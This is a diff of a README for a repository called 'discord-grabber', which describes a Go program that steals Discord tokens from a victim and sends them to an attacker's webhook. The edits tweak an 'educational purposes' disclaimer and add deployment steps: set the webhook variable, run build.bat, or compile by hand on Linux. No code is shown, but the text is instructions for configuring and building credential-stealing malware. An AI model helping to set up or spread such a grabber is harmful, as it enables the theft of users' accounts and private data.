cybe42/discord-grabber/README.md

 ## discord-grabber
 **A simple go program that can grab tokens from a user and send it through a webhook.**
-(for only educational purposes)
+(only for educational purposes)

-just change the webhook variable in the main function to your webhook, and you are done.
+just change the webhook variable in the main function to your webhook, and type `build.bat`, and you are done.

+if you are on linux don't use the batch file but just compile it yourself.

-(only supports windows)
+(grabber only supports windows)